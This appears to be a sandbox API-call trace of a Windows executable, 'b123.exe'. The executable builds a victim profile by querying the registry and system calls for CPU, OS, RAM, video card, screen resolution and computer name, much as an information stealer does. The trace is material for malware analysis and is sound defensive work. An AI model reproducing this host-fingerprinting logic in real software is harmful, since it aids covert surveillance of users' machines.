Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: " [0235.087] GetProcessHeap () returned 0x6b0000 [0235.087] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x104) returned 0x6fe3c0 [0235.088] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", ulOptions=0x0, samDesired=0x20119, phkResult=0x1987c4 | out: phkResult=0x1987c4*=0x288) returned 0x0 [0235.089] RegQueryValueExA (in: hKey=0x288, lpValueName="ProcessorNameString", lpReserved=0x0, lpType=0x0, lpData=0x6fe3c0, lpcbData=0x1987c0*=0xff | out: lpType=0x0, lpData=0x6fe3c0*=0x49, lpcbData=0x1987c0*=0x28) returned 0x0 [0235.089] RegCloseKey (hKey=0x288) returned 0x0 [0235.089] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: ", lpString2="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz" [0235.089] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\n" [0235.089] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\n", lpString2="Installed RAM: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: " [0235.089] GetProcessHeap () returned 0x6b0000 [0235.089] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x104) returned 0x6e95b0 [0235.089] GlobalMemoryStatusEx (in: lpBuffer=0x198778 | out: lpBuffer=0x198778) returned 1 [0235.090] wsprintfA (in: param_1=0x6e95b0, param_2="%d MB" | out: param_1="4096 MB") returned 7 [0235.090] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: ", lpString2="4096 MB" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB" [0235.090] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\n" [0235.090] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\n", lpString2="OS: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: " [0235.090] GetProcessHeap () returned 0x6b0000 [0235.090] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x104) returned 0x724720 [0235.090] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20119, phkResult=0x1987c4 | out: phkResult=0x1987c4*=0x288) returned 0x0 [0235.090] RegQueryValueExA (in: hKey=0x288, lpValueName="ProductName", lpReserved=0x0, lpType=0x0, lpData=0x724720, lpcbData=0x1987c0*=0xff | out: lpType=0x0, lpData=0x724720*=0x57, lpcbData=0x1987c0*=0xf) returned 0x0 [0235.090] RegCloseKey (hKey=0x288) returned 0x0 [0235.090] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: ", lpString2="Windows 10 Pro" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro" [0235.090] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro", lpString2=" (" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (" [0235.091] GetCurrentProcess () returned 0xffffffff [0235.091] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x1987c4 | out: Wow64Process=0x1987c4*=1) returned 1 [0235.091] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (", lpString2="x64" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64" [0235.091] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64", lpString2=" Bit)" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)" [0235.091] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\n" [0235.091] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\n", lpString2="Videocard: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: " [0235.091] EnumDisplayDevicesA (in: lpDevice=0x0, iDevNum=0x0, lpDisplayDevice=0x198620, dwFlags=0x1 | out: lpDisplayDevice=0x198620) returned 1 [0235.094] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: ", lpString2="Microsoft Basic Display Adapter" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter" [0235.094] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\n" [0235.094] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\n", lpString2="Display Resolution: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: " [0235.094] CreateDCA (pwszDriver="DISPLAY", pwszDevice=0x0, pszPort=0x0, pdm=0x0) returned 0x110106ca [0235.095] GetDeviceCaps (hdc=0x110106ca, index=8) returned 1440 [0235.096] GetDeviceCaps (hdc=0x110106ca, index=10) returned 900 [0235.096] ReleaseDC (hWnd=0x0, hDC=0x110106ca) returned 1 [0235.096] wsprintfA (in: param_1=0x1986b0, param_2="%dx%d" | out: param_1="1440x900") returned 8 [0235.096] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: ", lpString2="1440x900" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900" [0235.097] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900", lpString2="\n\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\n" [0235.097] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\n", lpString2="PC name: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: " [0235.097] GetProcessHeap () returned 0x6b0000 [0235.097] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x104) returned 0x724608 [0235.097] GetComputerNameA (in: lpBuffer=0x724608, nSize=0x1987c0 | out: lpBuffer="XC64ZB", nSize=0x1987c0) returned 1 [0235.097] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: ", lpString2="XC64ZB" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 